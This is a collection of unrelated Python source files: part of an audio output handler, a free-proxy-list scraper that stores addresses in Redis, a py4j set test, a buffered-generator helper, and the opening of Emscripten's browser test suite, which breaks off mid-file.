# Ensure object is output module:
assert isinstance(out, BaseOutput), "Class must inherit BaseOutput!"
# Add ourselves to the module:
out.out = self
# Check if we are running:
if self.run:
# Start and add the module:
self._submit_module(out)
# Otherwise, add it to the collection and start it later:
self._output.append(out)
def bind_synth(self, synth):
"""
Binds a synth chain to the Output class.
We return an OutputControl class to manage adding the synth to this class.
This allows synths to be managed by a sequencer,
or for them to be added for a specified amount of time.
We will bind the synth chain to the OutputControl class,
and return it.
We also set the sampling rate of the synth chain to our own,
so all synths can maintain a similar sampling rate.
:param synth: Synth chain to add to output
:type synth: BaseModule
:return: OutputControl with the synth chain bound to it
:rtype: OutputControl
"""
# Create an output control:
out = OutputControl()
out.OUT.append(self)
# Bind the synth to the output control:
out.bind(synth)
# Bind our sampling rate to the synth chain:
synth._info.samp = self.rate
# Return the output control:
return out
def start(self):
"""
Starts the OutputHandler.
This entails starting the output modules we have added,
and creating a barrier to ensure all modules are synchronized in getting their values.
We will start to consume audio information until we are stopped or paused.
"""
# Set the run value:
self.run = True
# Start all the modules in our collection:
for mod in self._output:
# Start the module:
self._submit_module(mod)
def stop(self):
"""
Stops the OutputHandler.
This entails stopping all the output modules in our collection,
and stopping the control thread that sends audio to the modules.
Once stopped, the OutputHandler can be started again.
However, some modules can't be restarted.
So be prepared for errors, or certain output modules not working.
"""
# Set the run value:
self.run = False
# Stop all output modules:
for mod in self._output:
# Stop the module:
self._stop_module(mod)
def join(self):
"""
Joins until all audio threads are stopped.
"""
for thread in self.thread:
# Join the thread:
thread.join()
def pause(self):
"""
Pauses the OutputHandler.
We clear our pause event,
which will cause the control thread to pause until it is unset.
Audio information will not be consumed when paused!
"""
# Clear the event:
self._pause.clear()
def resume(self):
"""
Resumes the OutputHandler.
We set out pause event,
which will cause the control thread to continue.
Audio information will be consumed when resumed!
"""
# Set the event:
self._pause.set()
def gen_value(self):
"""
Gets and sends the input from the synths to each output module.
This allows audio information to be sampled only when it is necessary!
Because modules block before getting information,
all modules will be ready to receive information when this method is called.
"""
# Iterate until we ge something valid:
while self.run:
# Pause if necessary:
self._pause.wait()
# Get some audio information:
try:
inp = next(self._input)
except Exception as e:
self.log.warning("Getting next value failed: {}".format(e))
self.log.debug("Traceback: \n{}".format(traceback.format_exc()))
if inp is None:
continue
# Iterate over our modules:
for mod in self._output:
# Add the input to the module:
if mod.special:
# Ignore and continue:
continue
mod.add_input(inp)
return inp
def remove_type(self, out_type):
"""
Removes an output module based upon the given type.
If we encounter this type, then we remove it.
:param out_type: Type of module to remove
"""
for mod in self._output:
# Check if the module is valid:
if type(mod) == out_type:
# Remove this module:
self._stop_module(mod)
# Remove the module:
self._output.remove(mod)
def search_type(self, out_type):
"""
Searches the output modules for a given type.
If this type is encountered, then we return True.
:param out_type: Type to search for
:type out_type: type
:return: True for present, False for not
:rtype: bool
"""
# Iterate over the output modules:
for mod in self._output:
if type(mod) == out_type:
# Found a match, return True
return True
# No match, return False
return False
def _add_synth(self, synth):
"""
Adds a synth to the AudioCollection.
This should really only be called by OutputControl,
as they have the ability to fine-tune the operation.
:param synth: Synth to be added to the Output class
:type synth: BaseModule
"""
# Add the synth to our collection:
self._input.add_module(synth)
def _remove_synth(self, synth):
"""
Removes a synth from the AudioCollection.
This should really only be called by OutputControl,
as they have the ability to fine-tune the operation.
:param synth: Synth to be removed from the Output class
:type synth: BaseModule
"""
# Remove the synth from our collection:
self._input.remove_module(synth)
def _submit_module(self, mod):
"""
We do the dirty work of starting and submitting a module to the ThreadPoolExecutor.
We assume the module inherits BaseOutput,
and that it has been added to the module collection.
If you wish to add a module, you should really use 'add_output'.
:param mod: Output module to start
:type mod: BaseOutput
"""
# Set the run value:
mod.running = True
# Start the module:
mod.start()
# Add it to the collection:
self._work.submit(mod.run)
'''
thread = threading.Thread(target=mod.run)
thread.start()
self.thread.append(thread)
'''
def _stop_module(self, mod):
"""
Stops the given module.
We call the 'stop' method, and set the running value to False.
We also add None to the input queue.
:param mod: Module to stop
:type mod: BaseOutput
"""
# Set the run value:
mod.running = False
# Call the stop method:
mod.stop()
# Add 'None' to the input queue:
mod.add_input(None)
|
Grab_proxies_free.py | import re
import copy
import json
import time
import requests
from lxml import etree
from multiprocessing import Process
from Certificate.DB.RedisClient import RedisClient
def one(page=5):
while True:
try:
url_list = ('http://www.kuaidaili.com/proxylist/{page}/'.format(page=page) for page in range(1, page + 1)) # 快代理
# 页数不用太多, 后面的全是历史IP, 可用性不高
for url in url_list:
content = requests.get(url).content
tree = etree.HTML(content.decode())
proxy_list = tree.xpath('.//div[@id="index_free_list"]//tbody/tr')
for proxy in proxy_list:
pro = ':'.join(proxy.xpath('./td/text()')[0:2])
# print(pro)
save(pro)
except:
continue
time.sleep(20)
def two(proxy_number=50):
while True:
try:
url = "http://m.66ip.cn/mo.php?sxb=&tqsl={}&port=&export=&ktip=&sxa=&submit=%CC%E1++%C8%A1&textarea=".format(
proxy_number)
html = requests.get(url).content.decode(encoding='gbk')
for proxy in re.findall(r'\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}:\d{1,5}', html):
# print(proxy)
save(proxy)
except:
continue
time.sleep(20)
def three(days=1):
session = requests.session()
headers = {
'Host': 'www.youdaili.net',
'Connection': 'keep-alive',
'Cache-Control': 'max-age=0',
'Upgrade-Insecure-Requests': '1',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
'Accept-Encoding': 'gzip, deflate, sdch',
'Accept-Language': 'zh-CN,zh;q=0.8',
'Cookie': 'yd_cookie=bba7ebbb-e48a-4d40abdd6d4734ad5863fe1573cf1c11de4a; Hm_lvt_f8bdd88d72441a9ad0f8c82db3113a84=1492514708,1493030573; Hm_lpvt_f8bdd88d72441a9ad0f8c82db3113a84=1493032241',
'If-None-Match': 'W/"59ea-54ddf1ef6a680"',
'If-Modified-Since': 'Mon, 24 Apr 2017 00:59:36 GMT',
}
session.headers.update(headers)
while True:
try:
url = "http://www.youdaili.net/Daili/http/" # 有代理
content = requests.get('http://www.youdaili.net/Daili/http/', headers=headers).content
# content = session.get(url, headers=headers, allow_redirects=True).content
print(content)
tree = etree.HTML(content.decode())
# page_url_list = tree.xpath('.//div[@class="chunlist"]/ul//a/@href')[0:days]
page_url_list = tree.xpath('//@href')
print()
for page_url in page_url_list:
html = requests.get(page_url).content.decode()
proxy_list = re.findall(r'\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}:\d{1,5}', html)
for proxy in proxy_list:
# print(proxy)
save(proxy)
except Exception as e:
print(e)
continue
time.sleep(10)
def four(page=10):
while True:
try:
headers = {
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
'Host': 'www.xicidaili.com',
'Upgrade-Insecure-Requests': '1',
'Accept-Language': 'zh-CN,zh;q=0.8',
'Connection': 'keep-alive',
'If-None-Match': 'W/"58408f21027f0e6342c149d748ca26b8"',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36',
}
url_list = ('http://www.xicidaili.com/nn/{page}/'.format(page=page) for page in range(1, page + 1))
for url in url_list:
content = requests.get(url, headers=headers).content
tree = etree.HTML(content.decode())
proxy_list = tree.xpath('//*[@id="ip_list"]//tr')
for proxy in proxy_list:
try:
pro = proxy.xpath('td[2]/text()')[0] + ':' + proxy.xpath('td[3]/text()')[0]
# print(pro)
save(pro)
except:
continue
except:
continue
time.sleep(10)
def five():
headers = {
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
'Host': 'www.goubanjia.com',
'Upgrade-Insecure-Requests': '1',
'Accept-Language': 'zh-CN,zh;q=0.8',
'Accept-Encoding': 'gzip, deflate, sdch',
'Connection': 'keep-alive',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36',
}
while True:
try:
url = "http://www.goubanjia.com/free/gngn/index.shtml" # 'goubanjia'
content = requests.get(url, headers=headers).content
tree = etree.HTML(content.decode())
for i in range(10):
try:
d = tree.xpath('.//table[@class="table"]/tbody/tr[{}]/td'.format(i + 1))[0]
o = d.xpath('.//span/text() | .//div/text()')
pro = ''.join(o[:-1]) + ':' + o[-1]
save(pro)
except:
continue
except:
continue
time.sleep(10)
def save(proxy):
conn = RedisClient(name='certificate_proxies')
proxies = {
'http': 'http://%s' % proxy,
'https': 'http://%s' % proxy,
}
# ping_url = 'http://www.baidu.com'
ping_url = 'http://zscx.osta.org.cn/'
status_code = requests.get(ping_url, timeout=(3.01, 6.01)).status_code
if status_code == 200:
p = json.dumps(proxies)
now = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(time.time()))
check = conn.exist(p)
if not check:
conn.set(p, 1)
conn.lpush(p)
now = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(time.time()))
print(now, ' New proxies: ', p)
else:
print(now, ' already exist proxies: ', p)
if __name__ == '__main__':
processes = {}
dd ={
1: one,
2: two,
# 3: 'three',
3: four,
4: five
}
for i in range(1, 4):
worker_name = i
p = Process(target=dd[i], args=())
p.start()
print(p.pid)
processes[worker_name] = p
while len(processes) > 0:
task_list = copy.deepcopy(list(processes.keys()))
print(task_list)
for task in task_list:
p = processes[task]
time.sleep(1)
if p.exitcode is None:
if not p.is_alive():
p_re = Process(target=dd[task], args=())
p_re.start()
processes[worker_name] = p_re
print('not alive restart', task, p_re.pid, p_re.name)
else:
continue
# print(task, 'still alive...')
elif p.exitcode == 0:
print(task, 'finished', p.pid, p.exitcode, not p.is_alive)
p.join()
del processes[task]
else:
p_re = Process(target=dd[task], args=())
p_re.start()
processes[worker_name] = p_re
print('err exit and restart', task, p_re.pid, p_re.name)
|
java_set_test.py | '''
Created on Mar 26, 2010
@author: Barthelemy Dagenais
'''
from __future__ import unicode_literals, absolute_import
from multiprocessing import Process
import subprocess
import time
import unittest
from py4j.java_gateway import JavaGateway
from py4j.tests.java_gateway_test import PY4J_JAVA_PATH, safe_shutdown
def start_example_server():
subprocess.call(["java", "-cp", PY4J_JAVA_PATH,
"py4j.examples.ExampleApplication"])
def start_example_app_process():
# XXX DO NOT FORGET TO KILL THE PROCESS IF THE TEST DOES NOT SUCCEED
p = Process(target=start_example_server)
p.start()
return p
class AutoConvertTest(unittest.TestCase):
def setUp(self):
# logger = logging.getLogger("py4j")
# logger.setLevel(logging.DEBUG)
# logger.addHandler(logging.StreamHandler())
self.p = start_example_app_process()
time.sleep(0.5)
self.gateway = JavaGateway(auto_convert=True)
def tearDown(self):
safe_shutdown(self)
self.p.join()
time.sleep(0.5)
def testAutoConvert(self):
sj = self.gateway.jvm.java.util.HashSet()
sj.add('b')
sj.add(1)
sp = set([1, 'b'])
self.assertTrue(sj.equals(sp))
class Test(unittest.TestCase):
def setUp(self):
# logger = logging.getLogger("py4j")
# logger.setLevel(logging.DEBUG)
# logger.addHandler(logging.StreamHandler())
self.p = start_example_app_process()
time.sleep(0.5)
self.gateway = JavaGateway()
def tearDown(self):
safe_shutdown(self)
self.p.join()
time.sleep(0.5)
def testTreeSet(self):
# self.gateway.jvm.py4j.GatewayServer.turnLoggingOn()
set1 = set()
set2 = self.gateway.jvm.java.util.TreeSet()
set1.add('a')
set2.add('a')
self.assertEqual(len(set1), len(set2))
self.assertEqual('a' in set1, 'a' in set2)
self.assertEqual(repr(set1), repr(set2))
set1.add('b')
set2.add('b')
self.assertEqual(len(set1), len(set2))
self.assertEqual('a' in set1, 'a' in set2)
self.assertEqual('b' in set1, 'b' in set2)
# not a good assumption with Python 3.3. Oh dear.
#self.assertEqual(repr(set1), repr(set2))
set1.remove('a')
set2.remove('a')
self.assertEqual(len(set1), len(set2))
self.assertEqual('a' in set1, 'a' in set2)
self.assertEqual('b' in set1, 'b' in set2)
#self.assertEqual(repr(set1), repr(set2))
set1.clear()
set2.clear()
self.assertEqual(len(set1), len(set2))
self.assertEqual('a' in set1, 'a' in set2)
self.assertEqual('b' in set1, 'b' in set2)
#self.assertEqual(repr(set1), repr(set2))
def testHashSet(self):
set1 = set()
set2 = self.gateway.jvm.java.util.HashSet()
set1.add('a')
set2.add('a')
set1.add(1)
set2.add(1)
set1.add('b')
set2.add('b')
self.assertEqual(len(set1), len(set2))
self.assertEqual('a' in set1, 'a' in set2)
self.assertEqual('b' in set1, 'b' in set2)
self.assertEqual(1 in set1, 1 in set2)
set1.remove(1)
set2.remove(1)
self.assertEqual(len(set1), len(set2))
self.assertEqual('a' in set1, 'a' in set2)
self.assertEqual('b' in set1, 'b' in set2)
self.assertEqual(1 in set1, 1 in set2)
set1.clear()
set2.clear()
self.assertEqual(len(set1), len(set2))
self.assertEqual('a' in set1, 'a' in set2)
self.assertEqual('b' in set1, 'b' in set2)
self.assertEqual(1 in set1, 1 in set2)
if __name__ == "__main__":
unittest.main()
|
buffering.py | import multiprocessing as mp
import queue
import threading
def buffered_gen_mp(source_gen, buffer_size=2):
"""
Generator that runs a slow source generator in a separate process.
buffer_size: the maximal number of items to pre-generate (length of the buffer)
"""
if buffer_size < 2:
raise RuntimeError("Minimal buffer size is 2!")
buffer = mp.Queue(maxsize=buffer_size - 1)
# the effective buffer size is one less, because the generation process
# will generate one extra element and block until there is room in the buffer.
def _buffered_generation_process(source_gen, buffer):
for data in source_gen:
buffer.put(data, block=True)
buffer.put(None) # sentinel: signal the end of the iterator
buffer.close() # unfortunately this does not suffice as a signal: if buffer.get()
# was called and subsequently the buffer is closed, it will block forever.
process = mp.Process(target=_buffered_generation_process, args=(source_gen, buffer))
process.start()
for data in iter(buffer.get, None):
yield data
def buffered_gen_threaded(source_gen, buffer_size=2):
"""
Generator that runs a slow source generator in a separate thread. Beware of the GIL!
buffer_size: the maximal number of items to pre-generate (length of the buffer)
"""
if buffer_size < 2:
raise RuntimeError("Minimal buffer size is 2!")
buffer = queue.Queue(maxsize=buffer_size - 1)
# the effective buffer size is one less, because the generation process
# will generate one extra element and block until there is room in the buffer.
def _buffered_generation_thread(source_gen, buffer):
for data in source_gen:
buffer.put(data, block=True)
buffer.put(None) # sentinel: signal the end of the iterator
thread = threading.Thread(target=_buffered_generation_thread, args=(source_gen, buffer))
thread.daemon = True
thread.start()
for data in iter(buffer.get, None):
yield data
|
test_browser.py | # coding=utf-8
# Copyright 2013 The Emscripten Authors. All rights reserved.
# Emscripten is available under two separate licenses, the MIT license and the
# University of Illinois/NCSA Open Source License. Both these licenses can be
# found in the LICENSE file.
import argparse
import json
import multiprocessing
import os
import random
import shlex
import shutil
import subprocess
import time
import unittest
import webbrowser
import zlib
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.request import urlopen
from runner import BrowserCore, RunnerCore, path_from_root, has_browser, EMTEST_BROWSER, Reporting
from runner import create_test_file, parameterized, ensure_dir, disabled
from tools import building
from tools import shared
from tools import system_libs
from tools.shared import PYTHON, EMCC, WINDOWS, FILE_PACKAGER, PIPE
from tools.shared import try_delete, config
def test_chunked_synchronous_xhr_server(support_byte_ranges, chunkSize, data, checksum, port):
class ChunkedServerHandler(BaseHTTPRequestHandler):
def sendheaders(s, extra=[], length=len(data)):
s.send_response(200)
s.send_header("Content-Length", str(length))
s.send_header("Access-Control-Allow-Origin", "http://localhost:%s" % port)
s.send_header('Cross-Origin-Resource-Policy', 'cross-origin')
s.send_header('Cache-Control', 'no-cache, no-store, must-revalidate')
s.send_header("Access-Control-Expose-Headers", "Content-Length, Accept-Ranges")
s.send_header("Content-type", "application/octet-stream")
if support_byte_ranges:
s.send_header("Accept-Ranges", "bytes")
for i in extra:
s.send_header(i[0], i[1])
s.end_headers()
def do_HEAD(s):
s.sendheaders()
def do_OPTIONS(s):
s.sendheaders([("Access-Control-Allow-Headers", "Range")], 0)
def do_GET(s):
if s.path == '/':
s.sendheaders()
elif not support_byte_ranges:
s.sendheaders()
s.wfile.write(data)
else:
start, end = s.headers.get("range").split("=")[1].split("-")
start = int(start)
end = int(end)
end = min(len(data) - 1, end)
length = end - start + 1
s.sendheaders([], length)
s.wfile.write(data[start:end + 1])
# CORS preflight makes OPTIONS requests which we need to account for.
expectedConns = 22
httpd = HTTPServer(('localhost', 11111), ChunkedServerHandler)
for i in range(expectedConns + 1):
httpd.handle_request()
def shell_with_script(shell_file, output_file, replacement):
with open(path_from_root('src', shell_file)) as input:
with open(output_file, 'w') as output:
output.write(input.read().replace('{{{ SCRIPT }}}', replacement))
def is_chrome():
return EMTEST_BROWSER and 'chrom' in EMTEST_BROWSER.lower()
def no_chrome(note='chrome is not supported'):
if is_chrome():
return unittest.skip(note)
return lambda f: f
def is_firefox():
return EMTEST_BROWSER and 'firefox' in EMTEST_BROWSER.lower()
def no_firefox(note='firefox is not supported'):
if is_firefox():
return unittest.skip(note)
return lambda f: f
def no_swiftshader(f):
assert callable(f)
def decorated(self):
if is_chrome() and '--use-gl=swiftshader' in EMTEST_BROWSER:
self.skipTest('not compatible with swiftshader')
return f(self)
return decorated
def requires_threads(f):
assert callable(f)
def decorated(self, *args, **kwargs):
if os.environ.get('EMTEST_LACKS_THREAD_SUPPORT'):
self.skipTest('EMTEST_LACKS_THREAD_SUPPORT is set')
return f(self, *args, **kwargs)
return decorated
def requires_asmfs(f):
assert callable(f)
def decorated(self, *args, **kwargs):
# https://github.com/emscripten-core/emscripten/issues/9534
self.skipTest('ASMFS is looking for a maintainer')
return f(self, *args, **kwargs)
return decorated
# Today we only support the wasm backend so any tests that is disabled under the llvm
# backend is always disabled.
# TODO(sbc): Investigate all tests with this decorator and either fix of remove the test.
def no_wasm_backend(note=''):
assert not callable(note)
return unittest.skip(note)
requires_graphics_hardware = unittest.skipIf(os.getenv('EMTEST_LACKS_GRAPHICS_HARDWARE'), "This test requires graphics hardware")
requires_sound_hardware = unittest.skipIf(os.getenv('EMTEST_LACKS_SOUND_HARDWARE'), "This test requires sound hardware")
requires_sync_compilation = unittest.skipIf(is_chrome(), "This test requires synchronous compilation, which does not work in Chrome (except for tiny wasms)")
requires_offscreen_canvas = unittest.skipIf(os.getenv('EMTEST_LACKS_OFFSCREEN_CANVAS'), "This test requires a browser with OffscreenCanvas")
class browser(BrowserCore):
@classmethod
def setUpClass(cls):
super(browser, cls).setUpClass()
cls.browser_timeout = 60
print()
print('Running the browser tests. Make sure the browser allows popups from localhost.')
print()
def setUp(self):
super(BrowserCore, self).setUp()
# avoid various compiler warnings that many browser tests currently generate
self.emcc_args += [
'-Wno-pointer-sign',
'-Wno-int-conversion',
]
def test_sdl1_in_emscripten_nonstrict_mode(self):
if 'EMCC_STRICT' in os.environ and int(os.environ['EMCC_STRICT']):
self.skipTest('This test requires being run in non-strict mode (EMCC_STRICT env. variable unset)')
# TODO: This test is verifying behavior that will be deprecated at some point in the future, remove this test once
# system JS libraries are no longer automatically linked to anymore.
self.btest('hello_world_sdl.cpp', reference='htmltest.png')
def test_sdl1(self):
self.btest('hello_world_sdl.cpp', reference='htmltest.png', args=['-lSDL', '-lGL'])
self.btest('hello_world_sdl.cpp', reference='htmltest.png', args=['-s', 'USE_SDL', '-lGL']) # is the default anyhow
# Deliberately named as test_zzz_* to make this test the last one
# as this test may take the focus away from the main test window
# by opening a new window and possibly not closing it.
def test_zzz_html_source_map(self):
if not has_browser():
self.skipTest('need a browser')
cpp_file = 'src.cpp'
html_file = 'src.html'
# browsers will try to 'guess' the corresponding original line if a
# generated line is unmapped, so if we want to make sure that our
# numbering is correct, we need to provide a couple of 'possible wrong
# answers'. thus, we add some printf calls so that the cpp file gets
# multiple mapped lines. in other words, if the program consists of a
# single 'throw' statement, browsers may just map any thrown exception to
# that line, because it will be the only mapped line.
with open(cpp_file, 'w') as f:
f.write(r'''
#include <cstdio>
int main() {
printf("Starting test\n");
try {
throw 42; // line 8
} catch (int e) { }
printf("done\n");
return 0;
}
''')
# use relative paths when calling emcc, because file:// URIs can only load
# sourceContent when the maps are relative paths
try_delete(html_file)
try_delete(html_file + '.map')
self.compile_btest(['src.cpp', '-o', 'src.html', '-g4'])
self.assertExists(html_file)
self.assertExists('src.wasm.map')
webbrowser.open_new('file://' + html_file)
print('''
If manually bisecting:
Check that you see src.cpp among the page sources.
Even better, add a breakpoint, e.g. on the printf, then reload, then step
through and see the print (best to run with EMTEST_SAVE_DIR=1 for the reload).
''')
def test_emscripten_log(self):
self.btest_exit(path_from_root('tests', 'emscripten_log', 'emscripten_log.cpp'), 0,
args=['--pre-js', path_from_root('src', 'emscripten-source-map.min.js'), '-g4'])
def test_preload_file(self):
absolute_src_path = os.path.join(self.get_dir(), 'somefile.txt').replace('\\', '/')
open(absolute_src_path, 'w').write('''load me right before running the code please''')
absolute_src_path2 = os.path.join(self.get_dir(), '.somefile.txt').replace('\\', '/')
open(absolute_src_path2, 'w').write('''load me right before running the code please''')
absolute_src_path3 = os.path.join(self.get_dir(), 'some@file.txt').replace('\\', '/')
open(absolute_src_path3, 'w').write('''load me right before running the code please''')
def make_main(path):
print('make main at', path)
path = path.replace('\\', '\\\\').replace('"', '\\"') # Escape tricky path name for use inside a C string.
create_test_file('main.cpp', r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
FILE *f = fopen("%s", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%%s|\n", buf);
int result = !strcmp("load me right before", buf);
REPORT_RESULT(result);
return 0;
}
''' % path)
test_cases = [
# (source preload-file string, file on target FS to load)
("somefile.txt", "somefile.txt"),
(".somefile.txt@somefile.txt", "somefile.txt"),
("./somefile.txt", "somefile.txt"),
("somefile.txt@file.txt", "file.txt"),
("./somefile.txt@file.txt", "file.txt"),
("./somefile.txt@./file.txt", "file.txt"),
("somefile.txt@/file.txt", "file.txt"),
("somefile.txt@/", "somefile.txt"),
(absolute_src_path + "@file.txt", "file.txt"),
(absolute_src_path + "@/file.txt", "file.txt"),
(absolute_src_path + "@/", "somefile.txt"),
("somefile.txt@/directory/file.txt", "/directory/file.txt"),
("somefile.txt@/directory/file.txt", "directory/file.txt"),
(absolute_src_path + "@/directory/file.txt", "directory/file.txt"),
("some@@file.txt@other.txt", "other.txt"),
("some@@file.txt@some@@otherfile.txt", "some@otherfile.txt")]
for srcpath, dstpath in test_cases:
print('Testing', srcpath, dstpath)
make_main(dstpath)
self.compile_btest(['main.cpp', '--preload-file', srcpath, '-o', 'page.html'])
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
if WINDOWS:
# On Windows, the following non-alphanumeric non-control code ASCII characters are supported.
# The characters <, >, ", |, ?, * are not allowed, because the Windows filesystem doesn't support those.
tricky_filename = '!#$%&\'()+,-. ;=@[]^_`{}~.txt'
else:
# All 7-bit non-alphanumeric non-control code ASCII characters except /, : and \ are allowed.
tricky_filename = '!#$%&\'()+,-. ;=@[]^_`{}~ "*<>?|.txt'
open(os.path.join(self.get_dir(), tricky_filename), 'w').write('''load me right before running the code please''')
make_main(tricky_filename)
# As an Emscripten-specific feature, the character '@' must be escaped in the form '@@' to not confuse with the 'src@dst' notation.
self.compile_btest(['main.cpp', '--preload-file', tricky_filename.replace('@', '@@'), '-o', 'page.html'])
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
# By absolute path
make_main('somefile.txt') # absolute becomes relative
self.compile_btest(['main.cpp', '--preload-file', absolute_src_path, '-o', 'page.html'])
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
# Test subdirectory handling with asset packaging.
try_delete('assets')
ensure_dir('assets/sub/asset1/'.replace('\\', '/'))
ensure_dir('assets/sub/asset1/.git'.replace('\\', '/')) # Test adding directory that shouldn't exist.
ensure_dir('assets/sub/asset2/'.replace('\\', '/'))
create_test_file('assets/sub/asset1/file1.txt', '''load me right before running the code please''')
create_test_file('assets/sub/asset1/.git/shouldnt_be_embedded.txt', '''this file should not get embedded''')
create_test_file('assets/sub/asset2/file2.txt', '''load me right before running the code please''')
absolute_assets_src_path = 'assets'.replace('\\', '/')
def make_main_two_files(path1, path2, nonexistingpath):
create_test_file('main.cpp', r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
FILE *f = fopen("%s", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%%s|\n", buf);
int result = !strcmp("load me right before", buf);
f = fopen("%s", "r");
if (f == NULL)
result = 0;
fclose(f);
f = fopen("%s", "r");
if (f != NULL)
result = 0;
REPORT_RESULT(result);
return 0;
}
''' % (path1, path2, nonexistingpath))
test_cases = [
# (source directory to embed, file1 on target FS to load, file2 on target FS to load, name of a file that *shouldn't* exist on VFS)
("assets", "assets/sub/asset1/file1.txt", "assets/sub/asset2/file2.txt", "assets/sub/asset1/.git/shouldnt_be_embedded.txt"),
("assets/", "assets/sub/asset1/file1.txt", "assets/sub/asset2/file2.txt", "assets/sub/asset1/.git/shouldnt_be_embedded.txt"),
("assets@/", "/sub/asset1/file1.txt", "/sub/asset2/file2.txt", "/sub/asset1/.git/shouldnt_be_embedded.txt"),
("assets/@/", "/sub/asset1/file1.txt", "/sub/asset2/file2.txt", "/sub/asset1/.git/shouldnt_be_embedded.txt"),
("assets@./", "/sub/asset1/file1.txt", "/sub/asset2/file2.txt", "/sub/asset1/.git/shouldnt_be_embedded.txt"),
(absolute_assets_src_path + "@/", "/sub/asset1/file1.txt", "/sub/asset2/file2.txt", "/sub/asset1/.git/shouldnt_be_embedded.txt"),
(absolute_assets_src_path + "@/assets", "/assets/sub/asset1/file1.txt", "/assets/sub/asset2/file2.txt", "assets/sub/asset1/.git/shouldnt_be_embedded.txt")]
for test in test_cases:
(srcpath, dstpath1, dstpath2, nonexistingpath) = test
make_main_two_files(dstpath1, dstpath2, nonexistingpath)
print(srcpath)
self.compile_btest(['main.cpp', '--preload-file', srcpath, '--exclude-file', '*/.*', '-o', 'page.html'])
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
# Should still work with -o subdir/..
make_main('somefile.txt') # absolute becomes relative
ensure_dir('dirrey')
self.compile_btest(['main.cpp', '--preload-file', absolute_src_path, '-o', 'dirrey/page.html'])
self.run_browser('dirrey/page.html', 'You should see |load me right before|.', '/report_result?1')
# With FS.preloadFile
create_test_file('pre.js', '''
Module.preRun = function() {
FS.createPreloadedFile('/', 'someotherfile.txt', 'somefile.txt', true, false); // we need --use-preload-plugins for this.
};
''')
make_main('someotherfile.txt')
self.compile_btest(['main.cpp', '--pre-js', 'pre.js', '-o', 'page.html', '--use-preload-plugins'])
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
# Tests that user .html shell files can manually download .data files created with --preload-file cmdline.
def test_preload_file_with_manual_data_download(self):
src = path_from_root('tests/manual_download_data.cpp')
create_test_file('file.txt', '''Hello!''')
self.compile_btest([src, '-o', 'manual_download_data.js', '--preload-file', 'file.txt@/file.txt'])
shutil.copyfile(path_from_root('tests', 'manual_download_data.html'), 'manual_download_data.html')
self.run_browser('manual_download_data.html', 'Hello!', '/report_result?1')
# Tests that if the output files have single or double quotes in them, that it will be handled by correctly escaping the names.
def test_output_file_escaping(self):
tricky_part = '\'' if WINDOWS else '\' and \"' # On Windows, files/directories may not contain a double quote character. On non-Windowses they can, so test that.
d = 'dir with ' + tricky_part
abs_d = os.path.join(self.get_dir(), d)
ensure_dir(abs_d)
txt = 'file with ' + tricky_part + '.txt'
abs_txt = os.path.join(abs_d, txt)
open(abs_txt, 'w').write('load me right before')
cpp = os.path.join(d, 'file with ' + tricky_part + '.cpp')
open(cpp, 'w').write(r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
FILE *f = fopen("%s", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%%s|\n", buf);
int result = !strcmp("|load me right before|", buf);
REPORT_RESULT(result);
return 0;
}
''' % (txt.replace('\'', '\\\'').replace('\"', '\\"')))
data_file = os.path.join(abs_d, 'file with ' + tricky_part + '.data')
data_js_file = os.path.join(abs_d, 'file with ' + tricky_part + '.js')
self.run_process([FILE_PACKAGER, data_file, '--use-preload-cache', '--indexedDB-name=testdb', '--preload', abs_txt + '@' + txt, '--js-output=' + data_js_file])
page_file = os.path.join(d, 'file with ' + tricky_part + '.html')
abs_page_file = os.path.join(self.get_dir(), page_file)
self.compile_btest([cpp, '--pre-js', data_js_file, '-o', abs_page_file, '-s', 'FORCE_FILESYSTEM'])
self.run_browser(page_file, '|load me right before|.', '/report_result?0')
def test_preload_caching(self):
create_test_file('main.cpp', r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
extern "C" {
extern int checkPreloadResults();
}
int main(int argc, char** argv) {
FILE *f = fopen("%s", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%%s|\n", buf);
int result = 0;
result += !strcmp("load me right before", buf);
result += checkPreloadResults();
REPORT_RESULT(result);
return 0;
}
''' % 'somefile.txt')
create_test_file('test.js', '''
mergeInto(LibraryManager.library, {
checkPreloadResults: function() {
var cached = 0;
var packages = Object.keys(Module['preloadResults']);
packages.forEach(function(package) {
var fromCache = Module['preloadResults'][package]['fromCache'];
if (fromCache)
++ cached;
});
return cached;
}
});
''')
# test caching of various sizes, including sizes higher than 128MB which is
# chrome's limit on IndexedDB item sizes, see
# https://cs.chromium.org/chromium/src/content/renderer/indexed_db/webidbdatabase_impl.cc?type=cs&q=%22The+serialized+value+is+too+large%22&sq=package:chromium&g=0&l=177
